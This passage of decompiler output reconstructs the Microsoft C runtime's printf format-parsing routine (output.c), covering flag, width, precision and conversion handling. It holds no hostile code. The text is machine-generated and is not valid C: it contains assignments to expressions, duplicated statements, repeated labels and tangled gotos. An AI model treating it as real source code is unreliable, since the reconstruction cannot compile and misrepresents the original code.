    											 *((short*)(_t600 - 0x14)) = 0x20;
    											 *(_t600 - 0x1c) = 1;
    										}
    									} else {
    										 *((short*)(_t600 - 0x14)) = 0x2b;
    										 *(_t600 - 0x1c) = 1;
    									}
    								} else {
    									 *((short*)(_t600 - 0x14)) = 0x2d;
    									 *(_t600 - 0x1c) = 1;
    								}
    							}
    							 *((intOrPtr*)(_t600 - 0x4ac)) =  *((intOrPtr*)(_t600 - 0x18)) -  *(_t600 - 0x24) -  *(_t600 - 0x1c);
    							if(( *(_t600 - 0x10) & 0x0000000c) == 0) {
    								E00B971B0(0x20,  *((intOrPtr*)(_t600 - 0x4ac)),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
    								_t603 = _t603 + 0x10;
    							}
    							E00B971F0( *(_t600 - 0x1c), _t600 - 0x14,  *(_t600 - 0x1c),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
    							_t603 = _t603 + 0x10;
    							if(( *(_t600 - 0x10) & 0x00000008) != 0) {
    								if(( *(_t600 - 0x10) & 0x00000004) == 0) {
    									E00B971B0(0x30,  *((intOrPtr*)(_t600 - 0x4ac)),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
    									_t603 = _t603 + 0x10;
    								}
    							}
    							if( *(_t600 - 0xc) != 0) {
    								L208:
    								E00B971F0( *(_t600 - 0x24),  *((intOrPtr*)(_t600 - 4)),  *(_t600 - 0x24),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
    								_t603 = _t603 + 0x10;
    								goto L209;
    							} else {
    								L201:
    								if( *(_t600 - 0x24) <= 0) {
    									goto L208;
    								}
    								L202:
    								 *((intOrPtr*)(_t600 - 0x4b0)) =  *((intOrPtr*)(_t600 - 4));
    								 *(_t600 - 0x4b4) =  *(_t600 - 0x24);
    								while(1) {
    									L203:
    									 *(_t600 - 0x4b4) =  *(_t600 - 0x4b4) - 1;
    									if( *(_t600 - 0x4b4) <= 0) {
    										break;
    									}
    									L204:
    									_t519 = E00B7C680(_t600 - 0x40);
    									_t523 = E00B90E50(_t600 - 0x458,  *((intOrPtr*)(_t600 - 0x4b0)),  *((intOrPtr*)( *((intOrPtr*)(E00B7C680(_t600 - 0x40))) + 0xac)), _t519);
    									_t603 = _t603 + 0x10;
    									 *(_t600 - 0x4b8) = _t523;
    									if( *(_t600 - 0x4b8) > 0) {
    										L206:
    										E00B97150( *(_t600 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
    										_t603 = _t603 + 0xc;
    										 *((intOrPtr*)(_t600 - 0x4b0)) =  *((intOrPtr*)(_t600 - 0x4b0)) +  *(_t600 - 0x4b8);
    										continue;
    									}
    									L205:
    									 *(_t600 - 0x44c) = 0xffffffff;
    									break;
    								}
    								L207:
    								L209:
    								if( *(_t600 - 0x44c) >= 0) {
    									if(( *(_t600 - 0x10) & 0x00000004) != 0) {
    										E00B971B0(0x20,  *((intOrPtr*)(_t600 - 0x4ac)),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
    										_t603 = _t603 + 0x10;
    									}
    								}
    							}
    							L212:
    							if( *(_t600 - 0x20) != 0) {
    								L00B7EB20( *(_t600 - 0x20), 2);
    								_t603 = _t603 + 8;
    								 *(_t600 - 0x20) = 0;
    							}
    							while(1) {
    								L214:
    								 *(_t600 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t600 + 0xc))));
    								_t538 =  *(_t600 - 0x454) & 0x0000ffff;
    								 *((intOrPtr*)(_t600 + 0xc)) =  *((intOrPtr*)(_t600 + 0xc)) + 2;
    								if(( *(_t600 - 0x454) & 0x0000ffff) == 0 ||  *(_t600 - 0x44c) < 0) {
    									break;
    								} else {
    									if(( *(_t600 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t600 - 0x454) & 0x0000ffff) > 0x78) {
    										 *(_t600 - 0x4d8) = 0;
    									} else {
    										 *(_t600 - 0x4d8) =  *(( *(_t600 - 0x454) & 0x0000ffff) +  &M00B77B58) & 0xf;
    									}
    								}
    								L7:
    								 *(_t600 - 0x450) =  *(_t600 - 0x4d8);
    								_t576 =  *(_t600 - 0x450) * 9;
    								_t493 =  *(_t600 - 0x45c);
    								_t546 = ( *(_t576 + _t493 + 0xb77b78) & 0x000000ff) >> 4;
    								 *(_t600 - 0x45c) = ( *(_t576 + _t493 + 0xb77b78) & 0x000000ff) >> 4;
    								if( *(_t600 - 0x45c) != 8) {
    									L16:
    									 *(_t600 - 0x4e0) =  *(_t600 - 0x45c);
    									if( *(_t600 - 0x4e0) > 7) {
    										continue;
    									}
    									L17:
    									switch( *((intOrPtr*)( *(_t600 - 0x4e0) * 4 +  &M00B97044))) {
    										case 0:
    											L18:
    											 *(_t600 - 0xc) = 1;
    											E00B97150( *(_t600 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
    											_t603 = _t603 + 0xc;
    											goto L214;
    										case 1:
    											L19:
    											 *(__ebp - 0x2c) = 0;
    											__ecx =  *(__ebp - 0x2c);
    											 *(__ebp - 0x28) = __ecx;
    											__edx =  *(__ebp - 0x28);
    											 *(__ebp - 0x18) =  *(__ebp - 0x28);
    											__eax =  *(__ebp - 0x18);
    											 *(__ebp - 0x1c) =  *(__ebp - 0x18);
    											 *(__ebp - 0x10) = 0;
    											 *(__ebp - 0x30) = 0xffffffff;
    											 *(__ebp - 0xc) = 0;
    											goto L214;
    										case 2:
    											L20:
    											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    											 *(__ebp - 0x4e4) = __ecx;
    											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    											__eflags =  *(__ebp - 0x4e4) - 0x10;
    											if( *(__ebp - 0x4e4) > 0x10) {
    												goto L27;
    											}
    											L21:
    											_t58 =  *(__ebp - 0x4e4) + 0xb9707c; // 0x498d04
    											__ecx =  *_t58 & 0x000000ff;
    											switch( *((intOrPtr*)(__ecx * 4 +  &M00B97064))) {
    												case 0:
    													goto L24;
    												case 1:
    													goto L25;
    												case 2:
    													goto L23;
    												case 3:
    													goto L22;
    												case 4:
    													goto L26;
    												case 5:
    													goto L27;
    											}
    										case 3:
    											L28:
    											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
    											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    												__edx =  *(__ebp - 0x18);
    												__edx =  *(__ebp - 0x18) * 0xa;
    												__eflags = __edx;
    												_t82 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    												__ecx = __edx + _t82;
    												 *(__ebp - 0x18) = __ecx;
    											} else {
    												__edx = __ebp + 0x14;
    												 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    												__eflags =  *(__ebp - 0x18);
    												if( *(__ebp - 0x18) < 0) {
    													__eax =  *(__ebp - 0x10);
    													__eax =  *(__ebp - 0x10) | 0x00000004;
    													__eflags = __eax;
    													 *(__ebp - 0x10) = __eax;
    													__ecx =  *(__ebp - 0x18);
    													__ecx =  ~( *(__ebp - 0x18));
    													 *(__ebp - 0x18) = __ecx;
    												}
    											}
    											L33:
    											goto L214;
    										case 4:
    											L34:
    											 *(__ebp - 0x30) = 0;
    											goto L214;
    										case 5:
    											L35:
    											__edx =  *(__ebp - 0x454) & 0x0000ffff;
    											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
    											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    												__ecx =  *(__ebp - 0x30);
    												__ecx =  *(__ebp - 0x30) * 0xa;
    												__eflags = __ecx;
    												_t93 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    												__eax = __ecx + _t93;
    												 *(__ebp - 0x30) = __ecx + _t93;
    											} else {
    												__eax = __ebp + 0x14;
    												 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    												__eflags =  *(__ebp - 0x30);
    												if( *(__ebp - 0x30) < 0) {
    													 *(__ebp - 0x30) = 0xffffffff;
    												}
    											}
    											goto L214;
    										case 6:
    											L41:
    											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    											 *(__ebp - 0x4e8) = __ecx;
    											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    											__eflags =  *(__ebp - 0x4e8) - 0x2e;
    											if( *(__ebp - 0x4e8) > 0x2e) {
    												L64:
    												goto L214;
    											}
    											L42:
    											_t101 =  *(__ebp - 0x4e8) + 0xb970a4; // 0x68b19003
    											__ecx =  *_t101 & 0x000000ff;
    											switch( *((intOrPtr*)(__ecx * 4 +  &M00B97090))) {
    												case 0:
    													L47:
    													__ecx =  *(__ebp + 0xc);
    													__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
    													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
    														L50:
    														__ecx =  *(__ebp + 0xc);
    														__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    														__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
    														if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
    															L53:
    															__ecx =  *(__ebp + 0xc);
    															__edx =  *__ecx & 0x0000ffff;
    															__eflags = ( *__ecx & 0x0000ffff) - 0x64;
    															if(( *__ecx & 0x0000ffff) == 0x64) {
    																L59:
    																L61:
    																goto L64;
    															}
    															L54:
    															__eax =  *(__ebp + 0xc);
    															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    															__eflags = __ecx - 0x69;
    															if(__ecx == 0x69) {
    																goto L59;
    															}
    															L55:
    															__edx =  *(__ebp + 0xc);
    															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
    															if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
    																goto L59;
    															}
    															L56:
    															__ecx =  *(__ebp + 0xc);
    															__edx =  *__ecx & 0x0000ffff;
    															__eflags = ( *__ecx & 0x0000ffff) - 0x75;
    															if(( *__ecx & 0x0000ffff) == 0x75) {
    																goto L59;
    															}
    															L57:
    															__eax =  *(__ebp + 0xc);
    															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    															__eflags = __ecx - 0x78;
    															if(__ecx == 0x78) {
    																goto L59;
    															}
    															L58:
    															__edx =  *(__ebp + 0xc);
    															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
    															if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
    																 *(__ebp - 0x45c) = 0;
    																goto L18;
    															}
    															goto L59;
    														}
    														L51:
    														__eax =  *(__ebp + 0xc);
    														__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    														__eflags = __ecx - 0x32;
    														if(__ecx != 0x32) {
    															goto L53;
    														} else {
    															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    															goto L61;
    														}
    													}
    													L48:
    													__eax =  *(__ebp + 0xc);
    													__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    													__eflags = __ecx - 0x34;
    													if(__ecx != 0x34) {
    														goto L50;
    													} else {
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    														goto L61;
    													}
    												case 1:
    													L62:
    													__ecx =  *(__ebp - 0x10);
    													__ecx =  *(__ebp - 0x10) | 0x00000020;
    													 *(__ebp - 0x10) = __ecx;
    													goto L64;
    												case 2:
    													L43:
    													__edx =  *(__ebp + 0xc);
    													__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
    													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
    														__eax =  *(__ebp - 0x10);
    														__eax =  *(__ebp - 0x10) | 0x00000010;
    														__eflags = __eax;
    														 *(__ebp - 0x10) = __eax;
    													} else {
    														__ecx =  *(__ebp + 0xc);
    														__ecx =  *(__ebp + 0xc) + 2;
    														 *(__ebp + 0xc) = __ecx;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    													}
    													goto L64;
    												case 3:
    													L63:
    													__edx =  *(__ebp - 0x10);
    													__edx =  *(__ebp - 0x10) | 0x00000800;
    													__eflags = __edx;
    													 *(__ebp - 0x10) = __edx;
    													goto L64;
    												case 4:
    													goto L64;
    											}
    										case 7:
    											L65:
    											__eax =  *(__ebp - 0x454) & 0x0000ffff;
    											 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
    											__ecx =  *(__ebp - 0x4ec);
    											__ecx =  *(__ebp - 0x4ec) - 0x41;
    											 *(__ebp - 0x4ec) = __ecx;
    											__eflags =  *(__ebp - 0x4ec) - 0x37;
    											if( *(__ebp - 0x4ec) > 0x37) {
    												goto L187;
    												do {
    													do {
    														while(1) {
    															L187:
    															if( *(_t600 - 0x28) != 0) {
    																goto L212;
    															}
    															goto L188;
    														}
    														L183:
    														__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
    														 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
    														__ecx =  *(__ebp - 4);
    														__ecx =  *(__ebp - 4) + 1;
    														 *(__ebp - 4) = __ecx;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
    														__eflags =  *(__ebp - 0x10) & 0x00000200;
    													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
    													__eflags =  *(__ebp - 0x24);
    													if( *(__ebp - 0x24) == 0) {
    														break;
    													}
    													L185:
    													__eax =  *(__ebp - 4);
    													__ecx =  *( *(__ebp - 4));
    													__eflags = __ecx - 0x30;
    												} while (__ecx == 0x30);
    												L186:
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												__eax =  *(__ebp - 4);
    												 *( *(__ebp - 4)) = 0x30;
    												__ecx =  *(__ebp - 0x24);
    												__ecx =  *(__ebp - 0x24) + 1;
    												__eflags = __ecx;
    												 *(__ebp - 0x24) = __ecx;
    												while(1) {
    													L187:
    													if( *(_t600 - 0x28) != 0) {
    														goto L212;
    													}
    													goto L188;
    												}
    											}
    											L66:
    											_t142 =  *(__ebp - 0x4ec) + 0xb97110; // 0xcccccc0d
    											__eax =  *_t142 & 0x000000ff;
    											switch( *((intOrPtr*)(( *_t142 & 0x000000ff) * 4 +  &M00B970D4))) {
    												case 0:
    													L119:
    													 *(__ebp - 0x2c) = 1;
    													 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
    													__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
    													 *(__ebp - 0x454) = __ax;
    													goto L120;
    												case 1:
    													L67:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    													__eflags =  *(__ebp - 0x10) & 0x00000830;
    													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    														__edx =  *(__ebp - 0x10);
    														__edx =  *(__ebp - 0x10) | 0x00000020;
    														__eflags = __edx;
    														 *(__ebp - 0x10) = __edx;
    													}
    													goto L69;
    												case 2:
    													L82:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    													__eflags =  *(__ebp - 0x10) & 0x00000830;
    													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    														__ecx =  *(__ebp - 0x10);
    														__ecx =  *(__ebp - 0x10) | 0x00000020;
    														__eflags = __ecx;
    														 *(__ebp - 0x10) = __ecx;
    													}
    													goto L84;
    												case 3:
    													L143:
    													 *(__ebp - 0x460) = 7;
    													goto L145;
    												case 4:
    													L75:
    													__eax = __ebp + 0x14;
    													 *(__ebp - 0x474) = E00B93D50(__ebp + 0x14);
    													__eflags =  *(__ebp - 0x474);
    													if( *(__ebp - 0x474) == 0) {
    														L77:
    														__edx =  *0xd121a0; // 0xb775a0
    														 *(__ebp - 4) = __edx;
    														__eax =  *(__ebp - 4);
    														 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    														L81:
    														goto L187;
    													}
    													L76:
    													__ecx =  *(__ebp - 0x474);
    													__eflags =  *(__ecx + 4);
    													if( *(__ecx + 4) != 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    														__eflags =  *(__ebp - 0x10) & 0x00000800;
    														if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    															 *(__ebp - 0xc) = 0;
    															__edx =  *(__ebp - 0x474);
    															__eax =  *(__edx + 4);
    															 *(__ebp - 4) =  *(__edx + 4);
    															__ecx =  *(__ebp - 0x474);
    															__edx =  *__ecx;
    															 *(__ebp - 0x24) =  *__ecx;
    														} else {
    															__edx =  *(__ebp - 0x474);
    															__eax =  *(__edx + 4);
    															 *(__ebp - 4) =  *(__edx + 4);
    															__ecx =  *(__ebp - 0x474);
    															__eax =  *__ecx;
    															asm("cdq");
    															 *__ecx - __edx =  *__ecx - __edx >> 1;
    															 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    															 *(__ebp - 0xc) = 1;
    														}
    														goto L81;
    													}
    													goto L77;
    												case 5:
    													L120:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													__edx = __ebp - 0x448;
    													 *(__ebp - 4) = __ebp - 0x448;
    													 *(__ebp - 0x44) = 0x200;
    													__eflags =  *(__ebp - 0x30);
    													if( *(__ebp - 0x30) >= 0) {
    														L122:
    														__eflags =  *(__ebp - 0x30);
    														if( *(__ebp - 0x30) != 0) {
    															L125:
    															__eflags =  *(__ebp - 0x30) - 0x200;
    															if( *(__ebp - 0x30) > 0x200) {
    																 *(__ebp - 0x30) = 0x200;
    															}
    															L127:
    															__eflags =  *(__ebp - 0x30) - 0xa3;
    															if( *(__ebp - 0x30) > 0xa3) {
    																__ecx =  *(__ebp - 0x30);
    																__ecx =  *(__ebp - 0x30) + 0x15d;
    																 *(__ebp - 0x20) = L00B7DEA0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																__eflags =  *(__ebp - 0x20);
    																if( *(__ebp - 0x20) == 0) {
    																	 *(__ebp - 0x30) = 0xa3;
    																} else {
    																	__edx =  *(__ebp - 0x20);
    																	 *(__ebp - 4) =  *(__ebp - 0x20);
    																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																}
    															}
    															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    															__edx =  *(__ebp + 0x14);
    															__eax =  *(__edx - 8);
    															__ecx =  *(__edx - 4);
    															 *(__ebp - 0x490) =  *(__edx - 8);
    															 *(__ebp - 0x48c) =  *(__edx - 4);
    															__ecx = __ebp - 0x40;
    															_push(E00B7C680(__ebp - 0x40));
    															__edx =  *(__ebp - 0x2c);
    															_push( *(__ebp - 0x2c));
    															__eax =  *(__ebp - 0x30);
    															_push( *(__ebp - 0x30));
    															__ecx =  *(__ebp - 0x454);
    															_push( *(__ebp - 0x454));
    															__edx =  *(__ebp - 0x44);
    															_push( *(__ebp - 0x44));
    															__eax =  *(__ebp - 4);
    															_push( *(__ebp - 4));
    															__ecx = __ebp - 0x490;
    															_push(__ebp - 0x490);
    															__edx =  *0xd12188; // 0xddc09d6c
    															E00B849C0(__edx) =  *__eax();
    															__esp = __esp + 0x1c;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    															__eflags =  *(__ebp - 0x10) & 0x00000080;
    															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) == 0) {
    																	__ecx = __ebp - 0x40;
    																	_push(E00B7C680(__ebp - 0x40));
    																	__ecx =  *(__ebp - 4);
    																	_push( *(__ebp - 4));
    																	__edx =  *0xd12194; // 0xddc09d6c
    																	E00B849C0(__edx) =  *__eax();
    																	__esp = __esp + 8;
    																}
    															}
    															__eax =  *(__ebp - 0x454) & 0x0000ffff;
    															__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
    															if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																__eflags =  *(__ebp - 0x10) & 0x00000080;
    																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																	__ecx = __ebp - 0x40;
    																	_push(E00B7C680(__ebp - 0x40));
    																	__edx =  *(__ebp - 4);
    																	_push( *(__ebp - 4));
    																	__eax =  *0xd12190; // 0xddc09d6c
    																	__eax =  *__eax();
    																	__esp = __esp + 8;
    																}
    															}
    															__ecx =  *(__ebp - 4);
    															__edx =  *( *(__ebp - 4));
    															__eflags =  *( *(__ebp - 4)) - 0x2d;
    															if( *( *(__ebp - 4)) == 0x2d) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																__ecx =  *(__ebp - 4);
    																__ecx =  *(__ebp - 4) + 1;
    																__eflags = __ecx;
    																 *(__ebp - 4) = __ecx;
    															}
    															__edx =  *(__ebp - 4);
    															 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    															do {
    																L187:
    																if( *(_t600 - 0x28) != 0) {
    																	goto L212;
    																}
    																goto L188;
    															} while ( *(__ebp - 0x4ec) > 0x37);
    															goto L66;
    														}
    														L123:
    														__eax =  *(__ebp - 0x454) & 0x0000ffff;
    														__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
    														if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
    															goto L125;
    														}
    														L124:
    														 *(__ebp - 0x30) = 1;
    														goto L127;
    													}
    													L121:
    													 *(__ebp - 0x30) = 6;
    													goto L127;
    												case 6:
    													L69:
    													 *(__ebp - 0xc) = 1;
    													__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    													 *(__ebp - 0x458) = __ax;
    													__ecx =  *(__ebp - 0x10);
    													__ecx =  *(__ebp - 0x10) & 0x00000020;
    													__eflags = __ecx;
    													if(__ecx == 0) {
    														 *(__ebp - 0x448) =  *(__ebp - 0x458);
    													} else {
    														 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
    														 *(__ebp - 0x470) = __dl;
    														 *((char*)(__ebp - 0x46f)) = 0;
    														__ecx = __ebp - 0x40;
    														__eax = E00B7C680(__ebp - 0x40);
    														__ecx = __ebp - 0x40;
    														E00B7C680(__ebp - 0x40) =  *__eax;
    														__ecx =  *(__ebp - 0x448 + 0xac);
    														__edx = __ebp - 0x470;
    														__eax = __ebp - 0x448;
    														__eax = E00B90E50(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
    														__eflags = __eax;
    														if(__eax < 0) {
    															 *(__ebp - 0x28) = 1;
    														}
    													}
    													__edx = __ebp - 0x448;
    													 *(__ebp - 4) = __ebp - 0x448;
    													 *(__ebp - 0x24) = 1;
    													while(1) {
    														L187:
    														if( *(_t600 - 0x28) != 0) {
    															goto L212;
    														}
    														goto L188;
    													}
    												case 7:
    													L140:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 8) = 0xa;
    													goto L150;
    												case 8:
    													goto L0;
    												case 9:
    													L148:
    													 *(__ebp - 8) = 8;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    													__eflags =  *(__ebp - 0x10) & 0x00000080;
    													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    														__edx =  *(__ebp - 0x10);
    														__edx =  *(__ebp - 0x10) | 0x00000200;
    														__eflags = __edx;
    														 *(__ebp - 0x10) = __edx;
    													}
    													goto L150;
    												case 0xa:
    													L142:
    													 *(__ebp - 0x30) = 8;
    													goto L143;
    												case 0xb:
    													L84:
    													__eflags =  *(__ebp - 0x30) - 0xffffffff;
    													if( *(__ebp - 0x30) != 0xffffffff) {
    														__edx =  *(__ebp - 0x30);
    														 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
    													} else {
    														 *(__ebp - 0x4f0) = 0x7fffffff;
    													}
    													__eax =  *(__ebp - 0x4f0);
    													 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
    													__ecx = __ebp + 0x14;
    													 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    													__eflags =  *(__ebp - 0x10) & 0x00000020;
    													if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    														L98:
    														__eflags =  *(__ebp - 4);
    														if( *(__ebp - 4) == 0) {
    															__ecx =  *0xd121a4; // 0xb77590
    															 *(__ebp - 4) = __ecx;
    														}
    														 *(__ebp - 0xc) = 1;
    														__edx =  *(__ebp - 4);
    														 *(__ebp - 0x480) =  *(__ebp - 4);
    														while(1) {
    															L101:
    															__eax =  *(__ebp - 0x47c);
    															__ecx =  *(__ebp - 0x47c);
    															__ecx =  *(__ebp - 0x47c) - 1;
    															 *(__ebp - 0x47c) = __ecx;
    															__eflags =  *(__ebp - 0x47c);
    															if( *(__ebp - 0x47c) == 0) {
    																break;
    															}
    															L102:
    															__edx =  *(__ebp - 0x480);
    															__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
    															__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
    															if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
    																break;
    															}
    															L103:
    															 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    															 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    														}
    														L104:
    														__edx =  *(__ebp - 0x480);
    														__edx =  *(__ebp - 0x480) -  *(__ebp - 4);
    														__eflags = __edx;
    														 *(__ebp - 0x24) = __edx;
    														goto L105;
    													} else {
    														L88:
    														__eflags =  *(__ebp - 4);
    														if( *(__ebp - 4) == 0) {
    															__eax =  *0xd121a0; // 0xb775a0
    															 *(__ebp - 4) = __eax;
    														}
    														__ecx =  *(__ebp - 4);
    														 *(__ebp - 0x478) = __ecx;
    														 *(__ebp - 0x24) = 0;
    														while(1) {
    															L92:
    															__eax =  *(__ebp - 0x24);
    															__eflags =  *(__ebp - 0x24) -  *(__ebp - 0x47c);
    															if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
    																break;
    															}
    															L93:
    															__ecx =  *(__ebp - 0x478);
    															__edx =  *__ecx;
    															__eflags =  *__ecx;
    															if( *__ecx == 0) {
    																break;
    															}
    															L94:
    															__ecx = __ebp - 0x40;
    															E00B7C680(__ebp - 0x40) =  *(__ebp - 0x478);
    															__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
    															__eax = E00B91090( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478));
    															__eflags = __eax;
    															if(__eax != 0) {
    																__edx =  *(__ebp - 0x478);
    																__edx =  *(__ebp - 0x478) + 1;
    																__eflags = __edx;
    																 *(__ebp - 0x478) = __edx;
    															}
    															 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    															 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    															__edx =  *(__ebp - 0x24);
    															__edx =  *(__ebp - 0x24) + 1;
    															__eflags = __edx;
    															 *(__ebp - 0x24) = __edx;
    														}
    														L97:
    														L105:
    														while(1) {
    															L187:
    															if( *(_t600 - 0x28) != 0) {
    																goto L212;
    															}
    															goto L188;
    														}
    													}
    												case 0xc:
    													L141:
    													 *(__ebp - 8) = 0xa;
    													goto L150;
    												case 0xd:
    													L144:
    													 *(__ebp - 0x460) = 0x27;
    													L145:
    													 *(__ebp - 8) = 0x10;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    													__eflags =  *(__ebp - 0x10) & 0x00000080;
    													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    														__edx = 0x30;
    														 *((short*)(__ebp - 0x14)) = __dx;
    														 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
    														__eflags =  *(__ebp - 0x460) + 0x51;
    														 *(__ebp - 0x12) = __ax;
    														 *(__ebp - 0x1c) = 2;
    													}
    													L150:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    													__eflags =  *(__ebp - 0x10) & 0x00008000;
    													if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    														__eflags =  *(__ebp - 0x10) & 0x00001000;
